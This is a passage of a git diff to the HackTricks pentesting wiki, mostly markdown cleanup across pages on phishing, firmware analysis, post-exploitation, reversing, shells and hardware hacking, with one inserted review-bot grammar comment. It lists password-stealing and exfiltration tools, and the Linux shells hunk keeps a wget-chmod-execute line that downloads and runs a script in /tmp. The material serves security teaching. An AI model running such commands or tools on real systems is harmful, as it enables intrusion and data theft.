[**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** {% endhint %} diff --git a/phishing-methodology/phishing-documents.md b/phishing-methodology/phishing-documents.md index f1b4a711..85ba5bce 100644 --- a/phishing-methodology/phishing-documents.md +++ b/phishing-methodology/phishing-documents.md 
@@ -48,5 +48,5 @@ The more common they are, the more probable the AV will detect it. ### MacOS -* ****[**macphish**](https://github.com/cldrn/macphish)**** -* ****[**Mythic Macro Generator**](https://github.com/cedowens/Mythic-Macro-Generator)**** +* [**macphish**](https://github.com/cldrn/macphish) +* [**Mythic Macro Generator**](https://github.com/cedowens/Mythic-Macro-Generator) diff --git a/physical-attacks/escaping-from-gui-applications/README.md b/physical-attacks/escaping-from-gui-applications/README.md index 91b1f74c..ab5a4cbc 100644 --- a/physical-attacks/escaping-from-gui-applications/README.md +++ b/physical-attacks/escaping-from-gui-applications/README.md @@ -26,7 +26,7 @@ Maybe **using a **_**Open with**_** option** you can open/execute some kind of s For example _cmd.exe, command.com, Powershell/Powershell ISE, mmc.exe, at.exe, taskschd.msc..._ find more binaries that can be used to execute commands (and perform unexpected actions) here: [https://lolbas-project.github.io/](https://lolbas-project.github.io) -#### \*NIX __ +#### \*NIX __ _bash, sh, zsh..._ More here: [https://gtfobins.github.io/](https://gtfobins.github.io) 
@@ -75,27 +75,27 @@ Registry editor: [https://sourceforge.net/projects/uberregedit/](https://sourcef ### ShortCuts -* Sticky Keys – Press SHIFT 5 times -* Mouse Keys – SHIFT+ALT+NUMLOCK -* High Contrast – SHIFT+ALT+PRINTSCN -* Toggle Keys – Hold NUMLOCK for 5 seconds -* Filter Keys – Hold right SHIFT for 12 seconds -* WINDOWS+F1 – Windows Search -* WINDOWS+D – Show Desktop -* WINDOWS+E – Launch Windows Explorer -* WINDOWS+R – Run -* WINDOWS+U – Ease of Access Centre -* WINDOWS+F – Search -* SHIFT+F10 – Context Menu -* CTRL+SHIFT+ESC – Task Manager -* CTRL+ALT+DEL – Splash screen on newer Windows versions -* F1 – Help F3 – Search -* F6 – Address Bar -* F11 – Toggle full screen within Internet Explorer -* CTRL+H – Internet Explorer History -* CTRL+T – Internet Explorer – New Tab -* CTRL+N – Internet Explorer – New Page -* CTRL+O – Open File +* Sticky Keys – Press SHIFT 5 times +* Mouse Keys – SHIFT+ALT+NUMLOCK +* High Contrast – SHIFT+ALT+PRINTSCN +* Toggle Keys – Hold NUMLOCK for 5 seconds +* Filter Keys – Hold right SHIFT for 12 seconds +* WINDOWS+F1 – Windows Search +* WINDOWS+D – Show Desktop +* WINDOWS+E – Launch Windows Explorer +* WINDOWS+R – Run +* WINDOWS+U – Ease of Access Centre +* WINDOWS+F – Search +* SHIFT+F10 – Context Menu +* CTRL+SHIFT+ESC – Task Manager +* CTRL+ALT+DEL – Splash screen on newer Windows versions +* F1 – Help F3 – Search +* F6 – Address Bar +* F11 – Toggle full screen within Internet Explorer +* CTRL+H – Internet Explorer History +* CTRL+T – Internet Explorer – New Tab +* CTRL+N – Internet Explorer – New Page +* CTRL+O – Open File * CTRL+S – Save CTRL+N – New RDP / Citrix ### Swipes diff --git a/physical-attacks/escaping-from-gui-applications/show-file-extensions.md b/physical-attacks/escaping-from-gui-applications/show-file-extensions.md index efebe2a6..66834c4b 100644 --- a/physical-attacks/escaping-from-gui-applications/show-file-extensions.md +++ b/physical-attacks/escaping-from-gui-applications/show-file-extensions.md 
@@ -41,4 +41,4 @@ That's it. You should now be able to see the true extensions of the files in you Copyright © 2008-2018 by Christopher Heng. All rights reserved. Get more "How To" guides and tutorials from [https://www.howtohaven.com/](https://www.howtohaven.com). -**This article can be found at** [**https://www.howtohaven.com/system/show-file-extensions-in-windows-explorer.shtml**](https://www.howtohaven.com/system/show-file-extensions-in-windows-explorer.shtml)**** +**This article can be found at** [**https://www.howtohaven.com/system/show-file-extensions-in-windows-explorer.shtml**](https://www.howtohaven.com/system/show-file-extensions-in-windows-explorer.shtml) diff --git a/physical-attacks/firmware-analysis/README.md b/physical-attacks/firmware-analysis/README.md index abdf41f1..c9da7b23 100644 --- a/physical-attacks/firmware-analysis/README.md +++ b/physical-attacks/firmware-analysis/README.md 
@@ -158,9 +158,9 @@ Some **interesting things to look** for inside the firmware: Tools that search for this kind of information (even if you always should take a manual look and get comfortable with the filesystem structure, the tools can help you finding **hidden things**): -* ****[**LinPEAS**](https://github.com/carlospolop/PEASS-ng)**:** Awesome bash script that in this case is useful for searching **sensitive information** inside the filesystem. Just **chroot inside the firmware filesystem and run it**. -* ****[**Firmwalker**](https://github.com/craigz28/firmwalker)**:** Bash script to search for potential sensitive information -* ****[**The Firmware Analysis and Comparison Tool (FACT)**](https://github.com/fkie-cad/FACT\_core): +* [**LinPEAS**](https://github.com/carlospolop/PEASS-ng)**:** Awesome bash script that in this case is useful for searching **sensitive information** inside the filesystem. Just **chroot inside the firmware filesystem and run it**. +* [**Firmwalker**](https://github.com/craigz28/firmwalker)**:** Bash script to search for potential sensitive information +* [**The Firmware Analysis and Comparison Tool (FACT)**](https://github.com/fkie-cad/FACT\_core): * Identification of software components such as operating system, CPU architecture, and third-party components along with their associated version information * Extraction of firmware filesystem (s ) from images * Detection of certificates and private keys 
@@ -172,9 +172,9 @@ Tools that search for this kind of information (even if you always should take a * Detection of binary mitigations such as NX, DEP, ASLR, stack canaries, RELRO, and FORTIFY\_SOURCE * REST API * and more... -* ****[**FwAnalyzer**](https://github.com/cruise-automation/fwanalyzer): FwAnalyzer is a tool to analyze (ext2/3/4), FAT/VFat, SquashFS, UBIFS filesystem images, cpio archives, and directory content using a set of configurable rules. -* ****[**ByteSweep**](https://gitlab.com/bytesweep/bytesweep): A Free Software IoT Firmware Security Analysis Tool -* ****[**ByteSweep-go**](https://gitlab.com/bytesweep/bytesweep-go): This is a complete rewrite of the original ByteSweep project in Go. +* [**FwAnalyzer**](https://github.com/cruise-automation/fwanalyzer): FwAnalyzer is a tool to analyze (ext2/3/4), FAT/VFat, SquashFS, UBIFS filesystem images, cpio archives, and directory content using a set of configurable rules. +* [**ByteSweep**](https://gitlab.com/bytesweep/bytesweep): A Free Software IoT Firmware Security Analysis Tool +* [**ByteSweep-go**](https://gitlab.com/bytesweep/bytesweep-go): This is a complete rewrite of the original ByteSweep project in Go. {% hint style="warning" %} Inside the filesystem you can also find **source code** of programs (that you should always **check**), but also **compiled binaries**. These programs might be somehow exposed and you should **decompile** and **check** them for potential vulnerabilities. 
@@ -234,11 +234,11 @@ There are several tools, based in **qemu** in general, that will allow you to em * [**https://github.com/firmadyne/firmadyne**](https://github.com/firmadyne/firmadyne)**:** * You need to install several things, configure postgres, then run the extractor.py script to extract the firmware, use the getArch.sh script to get the architecture. Then, use tar2db.py and makeImage.sh scripts to store information from the extracted image in the database and generate a QEMU image that we can emulate. The, use inferNetwork.sh script to get the network interfaces, and finally use the run.sh script, which is automatically created in the ./scratch/1/folder. -* [**https://github.com/attify/firmware-analysis-toolkit**](https://github.com/attify/firmware-analysis-toolkit)**:** - * This tool depends on firmadyne and automates the process of emulating the firmware using firmadynee. you need to configure `fat.config` before using it: `sudo python3 ./fat.py IoTGoat-rpi-2.img --qemu 2.5.0` -* ****[**https://github.com/therealsaumil/emux**](https://github.com/therealsaumil/emux)**** -* ****[**https://github.com/getCUJO/MIPS-X**](https://github.com/getCUJO/MIPS-X)**** -* ****[**https://github.com/qilingframework/qiling#qltool**](https://github.com/qilingframework/qiling#qltool) +* [**https://github.com/attify/firmware-analysis-toolkit**](https://github.com/attify/firmware-analysis-toolkit)**:** + * This tool depends on firmadyne and automates the process of emulating the firmware using firmadynee. you need to configure `fat.config` before using it: `sudo python3 ./fat.py IoTGoat-rpi-2.img --qemu 2.5.0` +* [**https://github.com/therealsaumil/emux**](https://github.com/therealsaumil/emux) +* [**https://github.com/getCUJO/MIPS-X**](https://github.com/getCUJO/MIPS-X) +* [**https://github.com/qilingframework/qiling#qltool**](https://github.com/qilingframework/qiling#qltool) ## **Dynamic analysis** 
@@ -301,8 +301,8 @@ Utilize the following references for further guidance: ## Prepared OSs to analyze Firmware -* ****[**AttifyOS**](https://github.com/adi0x90/attifyos): AttifyOS is a distro intended to help you perform security assessment and penetration testing of Internet of Things (IoT) devices. It saves you a lot of time by providing a pre-configured environment with all the necessary tools loaded. -* ****[**EmbedOS**](https://github.com/scriptingxss/EmbedOS): Embedded security testing operating system based on Ubuntu 18.04 preloaded with firmware security testing tools. +* [**AttifyOS**](https://github.com/adi0x90/attifyos): AttifyOS is a distro intended to help you perform security assessment and penetration testing of Internet of Things (IoT) devices. It saves you a lot of time by providing a pre-configured environment with all the necessary tools loaded. +* [**EmbedOS**](https://github.com/scriptingxss/EmbedOS): Embedded security testing operating system based on Ubuntu 18.04 preloaded with firmware security testing tools. ## Vulnerable firmware to practice diff --git a/post-exploitation.md b/post-exploitation.md index 1fad8ccc..36254e20 100644 --- a/post-exploitation.md +++ b/post-exploitation.md 
@@ -2,16 +2,16 @@ ### **Local l00t** -* ****[**PEASS-ng**](https://github.com/carlospolop/PEASS-ng): These scripts, apart for looking for PE vectors, will look for sensitive information inside the filesystem. -* ****[**LaZagne**](https://github.com/AlessandroZ/LaZagne): The **LaZagne project** is an open source application used to **retrieve lots of passwords** stored on a local computer. Each software stores its passwords using different techniques (plaintext, APIs, custom algorithms, databases, etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software. +* [**PEASS-ng**](https://github.com/carlospolop/PEASS-ng): These scripts, apart for looking for PE vectors, will look for sensitive information inside the filesystem. +* [**LaZagne**](https://github.com/AlessandroZ/LaZagne): The **LaZagne project** is an open source application used to **retrieve lots of passwords** stored on a local computer. Each software stores its passwords using different techniques (plaintext, APIs, custom algorithms, databases, etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software. ### **External Services** -* ****[**Conf-Thief**](https://github.com/antman1p/Conf-Thief): This Module will connect to Confluence's API using an access token, export to PDF, and download the Confluence documents that the target has access to. -* ****[**GD-Thief**](https://github.com/antman1p/GD-Thief): Red Team tool for exfiltrating files from a target's Google Drive that you(the attacker) has access to, via the Google Drive API. This includes includes all shared files, all files from shared drives, and all files from domain drives that the target has access to. -* ****[**GDir-Thief**](https://github.com/antman1p/GDir-Thief): Red Team tool for exfiltrating the target organization's Google People Directory that you have access to, via Google's People API. 
-* ****[**SlackPirate**](https://github.com/emtunc/SlackPirate)**:** This is a tool developed in Python which uses the native Slack APIs to extract 'interesting' information from a Slack workspace given an access token. -* ****[**Slackhound**](https://github.com/BojackThePillager/Slackhound): Slackhound is a command line tool for red and blue teams to quickly perform reconnaissance of a Slack workspace/organization. Slackhound makes collection of an organization's users, files, messages, etc. quickly searchable and large objects are written to CSV for offline review. +* [**Conf-Thief**](https://github.com/antman1p/Conf-Thief): This Module will connect to Confluence's API using an access token, export to PDF, and download the Confluence documents that the target has access to. +* [**GD-Thief**](https://github.com/antman1p/GD-Thief): Red Team tool for exfiltrating files from a target's Google Drive that you(the attacker) has access to, via the Google Drive API. This includes includes all shared files, all files from shared drives, and all files from domain drives that the target has access to. +* [**GDir-Thief**](https://github.com/antman1p/GDir-Thief): Red Team tool for exfiltrating the target organization's Google People Directory that you have access to, via Google's People API. +* [**SlackPirate**](https://github.com/emtunc/SlackPirate)**:** This is a tool developed in Python which uses the native Slack APIs to extract 'interesting' information from a Slack workspace given an access token. +* [**Slackhound**](https://github.com/BojackThePillager/Slackhound): Slackhound is a command line tool for red and blue teams to quickly perform reconnaissance of a Slack workspace/organization. Slackhound makes collection of an organization's users, files, messages, etc. quickly searchable and large objects are written to CSV for offline review. diff --git a/radio-hacking/pentesting-rfid.md b/radio-hacking/pentesting-rfid.md index a984f7fd..a471e917 100644 
--- a/radio-hacking/pentesting-rfid.md +++ b/radio-hacking/pentesting-rfid.md @@ -35,7 +35,7 @@ Many people refer to this technology as **Near Field Communication (NFC)**, a te ## Attacking RFID Systems with Proxmark3 -The first thing you need to do is to have a [**Proxmark3**](https://proxmark.com) and [**install the software and it's dependencie**](https://github.com/Proxmark/proxmark3/wiki/Kali-Linux)****[**s**](https://github.com/Proxmark/proxmark3/wiki/Kali-Linux). +The first thing you need to do is to have a [**Proxmark3**](https://proxmark.com) and [**install the software and it's dependencie**](https://github.com/Proxmark/proxmark3/wiki/Kali-Linux)[**s**](https://github.com/Proxmark/proxmark3/wiki/Kali-Linux). ### Attacking MIFARE Classic 1KB diff --git a/reversing/cryptographic-algorithms/README.md b/reversing/cryptographic-algorithms/README.md index 521e22d6..b1703b8d 100644 --- a/reversing/cryptographic-algorithms/README.md +++ b/reversing/cryptographic-algorithms/README.md @@ -20,7 +20,7 @@ Compresses and decompresses a given buffer of data. #### CryptAcquireContext - The **CryptAcquireContext** function is used to acquire a handle to a particular key container within a particular cryptographic service provider (CSP). **This returned handle is used in calls to CryptoAPI** functions that use the selected CSP. +The **CryptAcquireContext** function is used to acquire a handle to a particular key container within a particular cryptographic service provider (CSP). **This returned handle is used in calls to CryptoAPI** functions that use the selected CSP. #### CryptCreateHash 
@@ -67,7 +67,7 @@ It's composed of 3 main parts: **In order to identify a RC4 in a disassembly/decompiled code you can check for 2 loops of size 0x100 (with the use of a key) and then a XOR of the input data with the 256 values created before in the 2 loops probably using a %256 (mod 256)** {% endhint %} -### **Initialization stage/Substitution Box:** ****(Note the number 256 used as counter and how a 0 is written in each place of the 256 chars) +### **Initialization stage/Substitution Box:** (Note the number 256 used as counter and how a 0 is written in each place of the 256 chars) ![](<../../.gitbook/assets/image (377).png>) @@ -96,7 +96,7 @@ It's composed of 3 main parts: ### Characteristics * It's rare to find some malware using it but there are examples (Ursnif) -* Simple to determine if an algorithm is Serpent or not based on it's length (extremely long function) +* Simple to determine if an algorithm is Serpent or not based on it's length (extremely long function) ### Identifying diff --git a/reversing/reversing-tools-basic-methods/README.md b/reversing/reversing-tools-basic-methods/README.md index 7bf40d62..cf40c249 100644 --- a/reversing/reversing-tools-basic-methods/README.md +++ b/reversing/reversing-tools-basic-methods/README.md @@ -129,7 +129,7 @@ Then, looking to this ca see when the execution was stopped in the dll you want ## GUI Apps / Videogames -****[**Cheat Engine**](https://www.cheatengine.org/downloads.php) is a useful program to find where important values are saved inside the memory of a running game and change them. More info in: +[**Cheat Engine**](https://www.cheatengine.org/downloads.php) is a useful program to find where important values are saved inside the memory of a running game and change them. More info in: {% content-ref url="cheat-engine.md" %} [cheat-engine.md](cheat-engine.md) 
@@ -155,7 +155,7 @@ You can find a slightly modified version of Blobrunner in the following link. In ### Debugging a shellcode with jmp2it -****[**jmp2it** ](https://github.com/adamkramer/jmp2it/releases/tag/v1.4)is very similar to blobrunner. It will **allocate** the **shellcode** inside a space of memory, and start an **eternal loop**. You then need to **attach the debugger** to the process, **play start wait 2-5 secs and press stop** and you will find yourself inside the **eternal loop**. Jump to the next instruction of the eternal loop as it will be a call to the shellcode, and finally you will find yourself executing the shellcode. +[**jmp2it** ](https://github.com/adamkramer/jmp2it/releases/tag/v1.4)is very similar to blobrunner. It will **allocate** the **shellcode** inside a space of memory, and start an **eternal loop**. You then need to **attach the debugger** to the process, **play start wait 2-5 secs and press stop** and you will find yourself inside the **eternal loop**. Jump to the next instruction of the eternal loop as it will be a call to the shellcode, and finally you will find yourself executing the shellcode. ![](<../../.gitbook/assets/image (397).png>) @@ -163,7 +163,7 @@ You can download a compiled version of [jmp2it inside the releases page](https:/ ### Debugging shellcode using Cutter -****[**Cutter**](https://github.com/rizinorg/cutter/releases/tag/v1.12.0) is the GUI of radare. Using cutter you can emulate the shellcode and inspect it dynamically. +[**Cutter**](https://github.com/rizinorg/cutter/releases/tag/v1.12.0) is the GUI of radare. Using cutter you can emulate the shellcode and inspect it dynamically. Note that Cutter allows you to "Open File" and "Open Shellcode". In my case when I opened the shellcode as a file it decompiled it correctly, but when I opened it as a shellcode it didn't: 
@@ -219,7 +219,7 @@ apt-get install libz3-dev And [install keystone](https://github.com/keystone-engine/keystone/blob/master/docs/COMPILE-NIX.md) (`apt-get install cmake; mkdir build; cd build; ../make-share.sh; make install`) -If you are playing a **CTF, this workaround to find the flag** could be very useful: [https://dustri.org/b/defeating-the-recons-movfuscator-crackme.html](https://dustri.org/b/defeating-the-recons-movfuscator-crackme.html) +If you are playing a **CTF, this workaround to find the flag** could be very useful: [https://dustri.org/b/defeating-the-recons-movfuscator-crackme.html](https://dustri.org/b/defeating-the-recons-movfuscator-crackme.html) ## Rust @@ -234,7 +234,7 @@ Having the **name** of the **functions** being called, search for them on the ** For Delphi compiled binaries you can use [https://github.com/crypto2011/IDR](https://github.com/crypto2011/IDR) -I you have to reverse a Delphi binary I would suggest you to use the IDA plugin [https://github.com/Coldzer0/IDA-For-Delphi](https://github.com/Coldzer0/IDA-For-Delphi)**** +I you have to reverse a Delphi binary I would suggest you to use the IDA plugin [https://github.com/Coldzer0/IDA-For-Delphi](https://github.com/Coldzer0/IDA-For-Delphi) Just press **ATL+f7** (import python plugin in IDA) and select the python plugin. 
@@ -262,9 +262,9 @@ In this page you can find how to get the python code from an ELF/EXE python comp If you get the **binary** of a GBA game you can use different tools to **emulate** and **debug** it: -* ****[**no$gba**](https://problemkaputt.de/gba.htm) (_Download the debug version_) - Contains a debugger with interface -* ****[**mgba** ](https://mgba.io)- Contains a CLI debugger -* ****[**gba-ghidra-loader**](https://github.com/pudii/gba-ghidra-loader) - Ghidra plugin +* [**no$gba**](https://problemkaputt.de/gba.htm) (_Download the debug version_) - Contains a debugger with interface +* [**mgba** ](https://mgba.io)- Contains a CLI debugger +* [**gba-ghidra-loader**](https://github.com/pudii/gba-ghidra-loader) - Ghidra plugin * [**GhidraGBA**](https://github.com/SiD3W4y/GhidraGBA) - Ghidra plugin In [**no$gba**](https://problemkaputt.de/gba.htm), in _**Options --> Emulation Setup --> Controls**_** ** you can see how to press the Game Boy Advance **buttons** @@ -315,7 +315,7 @@ void FUN_080015a8(void) uVar4 = DAT_030004d8; ``` - It's found this code: +It's found this code: ```c do { @@ -369,7 +369,7 @@ In the previous code you can see that we are comparing **uVar1** (the place wher So, in this challenge, knowing the values of the buttons, you needed to **press a combination with a length smaller than 8 that the resulting addition is 0xf3.** -**Reference for this tutorial:** [**https://exp.codes/Nostalgia/**](https://exp.codes/Nostalgia/)**** +**Reference for this tutorial:** [**https://exp.codes/Nostalgia/**](https://exp.codes/Nostalgia/) ## Game Boy diff --git a/reversing/reversing-tools-basic-methods/cheat-engine.md b/reversing/reversing-tools-basic-methods/cheat-engine.md index 7d1dbd0a..ec22ed48 100644 --- a/reversing/reversing-tools-basic-methods/cheat-engine.md +++ b/reversing/reversing-tools-basic-methods/cheat-engine.md 
@@ -1,6 +1,6 @@ # Cheat Engine -****[**Cheat Engine**](https://www.cheatengine.org/downloads.php) is a useful program to find where important values are saved inside the memory of a running game and change them.\ +[**Cheat Engine**](https://www.cheatengine.org/downloads.php) is a useful program to find where important values are saved inside the memory of a running game and change them.\ When you download and run it, you are **presented** with a **tutorial** of how to use the tool. If you want to learn how to use the tool it's highly recommended to complete it. ## What are you searching? @@ -79,7 +79,7 @@ Note that there are a **lot of possible changes** and you can do these **steps a ### Random Memory Address - Finding the code -Until know we learnt how to find an address storing a value, but it's highly probably that in **different executions of the game that address is in different places of the memory**. So lets find out how to always find that address. +Until know we learnt how to find an address storing a value, but it's highly probably that in **different executions of the game that address is in different places of the memory**. So lets find out how to always find that address. Using some of the mentioned tricks, find the address where your current game is storing the important value. Then (stopping the game if you whish) do a **right click** on the found **address** and select "**Find out what accesses this address**" or "**Find out what writes to this address**": diff --git a/reversing/reversing-tools/README.md b/reversing/reversing-tools/README.md index fa604ff8..b83dad5a 100644 --- a/reversing/reversing-tools/README.md +++ b/reversing/reversing-tools/README.md 
@@ -145,7 +145,7 @@ You can find a slightly modified version of Blobrunner in the following link. In ### Debugging a shellcode with jmp2it -\*\*\*\*[**jmp2it** ](https://github.com/adamkramer/jmp2it/releases/tag/v1.4)is very similar to blobrunner. It will **allocate** the **shellcode** inside a space of memory, and start an **eternal loop**. You then need to **attach the debugger** to the process, **play start wait 2-5 secs and press stop** and you will find yourself inside the **eternal loop**. Jump to the next instruction of the eternal loop as it will be a call to the shellcode, and finally you will find yourself executing the shellcode. +[**jmp2it** ](https://github.com/adamkramer/jmp2it/releases/tag/v1.4)is very similar to blobrunner. It will **allocate** the **shellcode** inside a space of memory, and start an **eternal loop**. You then need to **attach the debugger** to the process, **play start wait 2-5 secs and press stop** and you will find yourself inside the **eternal loop**. Jump to the next instruction of the eternal loop as it will be a call to the shellcode, and finally you will find yourself executing the shellcode. ![](../../.gitbook/assets/image%20%28403%29.png) @@ -153,7 +153,7 @@ You can download a compiled version of [jmp2it inside the releases page](https:/ ### Debugging shellcode using Cutter -\*\*\*\*[**Cutter**](https://github.com/rizinorg/cutter/releases/tag/v1.12.0) is the GUI of radare. Using cutter you can emulate the shellcode and inspect it dynamically. +[**Cutter**](https://github.com/rizinorg/cutter/releases/tag/v1.12.0) is the GUI of radare. Using cutter you can emulate the shellcode and inspect it dynamically. Note that Cutter allows you to "Open File" and "Open Shellcode". In my case when I opened the shellcode as a file it decompiled it correctly, but when I opened it as a shellcode it didn't: 
@@ -171,7 +171,7 @@ You can see the stack for example inside a hex dump: ### Deobfuscating shellcode and getting executed functions -You should try ****[**scdbg**](http://sandsprite.com/blogs/index.php?uid=7&pid=152). +You should try [**scdbg**](http://sandsprite.com/blogs/index.php?uid=7&pid=152). It will tell you things like **which functions** is the shellcode using and if the shellcode is **decoding** itself in memory. ```bash diff --git a/shells/shells/linux.md b/shells/shells/linux.md index 1e1e89db..0993eb08 100644 --- a/shells/shells/linux.md +++ b/shells/shells/linux.md @@ -1,6 +1,6 @@ # Shells - Linux -**If you have questions about any of these shells you could check them with** [**https://explainshell.com/**](https://explainshell.com)**** +**If you have questions about any of these shells you could check them with** [**https://explainshell.com/**](https://explainshell.com) ## Full TTY @@ -43,7 +43,7 @@ wget http:///shell.sh -P /tmp; chmod +x /tmp/shell.sh; /tmp/shell.s ## Forward Shell You might find cases where you have a **RCE in a web app in a, Linux machine** but due to Iptables rules or other kind of filtering **you cannot get a reverse shell**. This "shell" allows you to maintain a PTY shell through that RCE using pipes inside the victim system.\ -You can find the code in [**https://github.com/IppSec/forward-shell**](https://github.com/IppSec/forward-shell)**** +You can find the code in [**https://github.com/IppSec/forward-shell**](https://github.com/IppSec/forward-shell) You just need to modify: diff --git a/stealing-sensitive-information-disclosure-from-a-web.md b/stealing-sensitive-information-disclosure-from-a-web.md index 8498b9e7..767847d5 100644 --- a/stealing-sensitive-information-disclosure-from-a-web.md +++ b/stealing-sensitive-information-disclosure-from-a-web.md 
@@ -4,6 +4,6 @@ If at some point you find a **web page that presents you sensitive information b Here I present you the main ways to can try to achieve it: * [**CORS bypass**](pentesting-web/cors-bypass.md): If you can bypass CORS headers you will be able to steal the information performing Ajax request for a malicious page. -* ****[**XSS**](pentesting-web/xss-cross-site-scripting/): If you find a XSS vulnerability on the page you may be able to abuse it to steal the information. -* ****[**Danging Markup**](pentesting-web/dangling-markup-html-scriptless-injection.md): If you cannot inject XSS tags you still may be able to steal the info using other regular HTML tags. +* [**XSS**](pentesting-web/xss-cross-site-scripting/): If you find a XSS vulnerability on the page you may be able to abuse it to steal the information. +* [**Danging Markup**](pentesting-web/dangling-markup-html-scriptless-injection.md): If you cannot inject XSS tags you still may be able to steal the info using other regular HTML tags. * [**Clickjaking**](pentesting-web/clickjacking.md): If there is no protection against this attack, you may be able to trick the user into sending you the sensitive data (an example [here](https://medium.com/bugbountywriteup/apache-example-servlet-leads-to-61a2720cac20)). diff --git a/todo/hardware-hacking/README.md b/todo/hardware-hacking/README.md index 033fc368..5b964a09 100644 --- a/todo/hardware-hacking/README.md +++ b/todo/hardware-hacking/README.md 
@@ -29,7 +29,7 @@ Boundary scans include tests of the four-wire **Test Access Port (TAP)**, a gene * Test data output (**TDO**) TDO is the pin that sends **data out of the chip**. * Test reset (**TRST**) input The optional TRST resets the finite state machine **to a known good state**. Alternatively, if the TMS is held at 1 for five consecutive clock cycles, it invokes a reset, the same way the TRST pin would, which is why TRST is optional. -Sometimes you will be able to find those pins marked in the PCB. In other occasions you might need to **find them**. +Sometimes you will be able to find those pins marked in the PCB. In other occasions you might need to **find them**. ### Identifying JTAG pins @@ -37,7 +37,7 @@ The fastest but most expensive way to detect JTAG ports is by using the **JTAGul It has **24 channels** you can connect to the boards pins. Then it performs a **BF attack** of all the possible combinations sending **IDCODE** and **BYPASS** boundary scan commands. If it receives a response, it displays the channel corresponding to each JTAG signal -A cheaper but much slower way of identifying JTAG pinouts is by using the [**JTAGenum**](https://github.com/cyphunk/JTAGenum/) **** loaded on an Arduino-compatible microcontroller. +A cheaper but much slower way of identifying JTAG pinouts is by using the [**JTAGenum**](https://github.com/cyphunk/JTAGenum/) loaded on an Arduino-compatible microcontroller. Using **JTAGenum**, you’d first **define the pins of the probing** device that you’ll use for the enumeration.You’d have to reference the device’s pinout diagram, and then connect these pins with the test points on your target device. diff --git a/todo/hardware-hacking/jtag.md b/todo/hardware-hacking/jtag.md index 37e89d65..ff3f8cf5 100644 --- a/todo/hardware-hacking/jtag.md +++ b/todo/hardware-hacking/jtag.md 
@@ -2,7 +2,7 @@ ## JTAGenum -****[**JTAGenum** ](https://github.com/cyphunk/JTAGenum)is a tool can be used with a Raspberry PI or an Arduino to find to try JTAG pins from an unknown chip.\ +[**JTAGenum** ](https://github.com/cyphunk/JTAGenum)is a tool can be used with a Raspberry PI or an Arduino to find to try JTAG pins from an unknown chip.\ In the **Arduino**, connect the **pins from 2 to 11 to 10pins potentially belonging to a JTAG**. Load the program in the Arduino and it will try to bruteforce all the pins to find if any pins belongs to JTAG and which one is each.\ In the **Raspberry PI** you can only use **pins from 1 to 6** (6pins, so you will go slower testing each potential JTAG pin). diff --git a/todo/hardware-hacking/radio.md b/todo/hardware-hacking/radio.md index fb56137c..d81c60f6 100644 --- a/todo/hardware-hacking/radio.md +++ b/todo/hardware-hacking/radio.md @@ -2,7 +2,7 @@ ## SigDigger -****[**SigDigger** ](https://github.com/BatchDrake/SigDigger)is a free digital signal analyzer for GNU/Linux and macOS, designed to extract information of unknown radio signals. It supports a variety of SDR devices through SoapySDR, and allows adjustable demodulation of FSK, PSK and ASK signals, decode analog video, analyze bursty signals and listen to analog voice channels (all in real time). +[**SigDigger** ](https://github.com/BatchDrake/SigDigger)is a free digital signal analyzer for GNU/Linux and macOS, designed to extract information of unknown radio signals. It supports a variety of SDR devices through SoapySDR, and allows adjustable demodulation of FSK, PSK and ASK signals, decode analog video, analyze bursty signals and listen to analog voice channels (all in real time). ### Basic Config @@ -157,7 +157,7 @@ In the previous image you can observe pretty good that **2 frequencies are used* This is because I capture the signal in booth frequencies, therefore one is approximately the other in negative: - + ![](<../../.gitbook/assets/image (656).png>) 
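Review bot: The jtag.md hunk rewrites the JTAGenum sentence but keeps "is a tool can be used with a Raspberry PI or an Arduino to find to try JTAG pins", which lacks a relative pronoun and doubles the verb; suggest "is a tool that can be used with a Raspberry Pi or an Arduino to try to find the JTAG pins of an unknown chip".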
diff --git a/todo/hardware-hacking/spi.md b/todo/hardware-hacking/spi.md index 4b5d0360..89cd621f 100644 --- a/todo/hardware-hacking/spi.md +++ b/todo/hardware-hacking/spi.md @@ -12,7 +12,7 @@ Note that even if the PINOUT of the Pirate Bus indicates pins for **MOSI** and * ![](<../../.gitbook/assets/image (648).png>) -In Windows or Linux you can use the program [**`flashrom`**](https://www.flashrom.org/Flashrom) **** to dump the content of the flash memory running something like: +In Windows or Linux you can use the program [**`flashrom`**](https://www.flashrom.org/Flashrom) to dump the content of the flash memory running something like: ```bash # In this command we are indicating: diff --git a/todo/misc.md b/todo/misc.md index cc0605a1..c754d66c 100644 --- a/todo/misc.md +++ b/todo/misc.md @@ -13,7 +13,7 @@ $6$- sha512 If you do not know what is behind a service, try to make and HTTP GET request. **UDP Scans**\ -****nc -nv -u -z -w 1 \ 160-16 +nc -nv -u -z -w 1 \ 160-16 An empty UDP packet is sent to a specific port. If the UDP port is open, no reply is sent back from the target machine. If the UDP port is closed, an ICMP port unreachable packet should be sent back from the target machine.\ diff --git a/todo/more-tools.md b/todo/more-tools.md index 89ce9363..a120619d 100644 --- a/todo/more-tools.md +++ b/todo/more-tools.md 
@@ -61,7 +61,7 @@ * [https://github.com/Mr-Un1k0d3r/PoisonHandler](https://github.com/Mr-Un1k0d3r/PoisonHandler) : Lateral movements * [https://freddiebarrsmith.com/trix/trix.html](https://freddiebarrsmith.com/trix/trix.html) : LOL bins * [https://gist.github.com/netbiosX/ee35fcd3722e401a38136cff7b751d79](https://gist.github.com/netbiosX/ee35fcd3722e401a38136cff7b751d79) ([https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/](https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/)): Persistence -* [https://github.com/odzhan/injection](https://github.com/odzhan/injection) : Windows Process Injection techniques +* [https://github.com/odzhan/injection](https://github.com/odzhan/injection) : Windows Process Injection techniques * [https://github.com/BankSecurity/Red\_Team](https://github.com/BankSecurity/Red\_Team) : Red Team scripts * [https://github.com/l0ss/Grouper2](https://github.com/l0ss/Grouper2) : find security-related misconfigurations in Active Directory Group Policy. * [https://www.wietzebeukema.nl/blog/powershell-obfuscation-using-securestring](https://www.wietzebeukema.nl/blog/powershell-obfuscation-using-securestring) : Securestring obfuscation diff --git 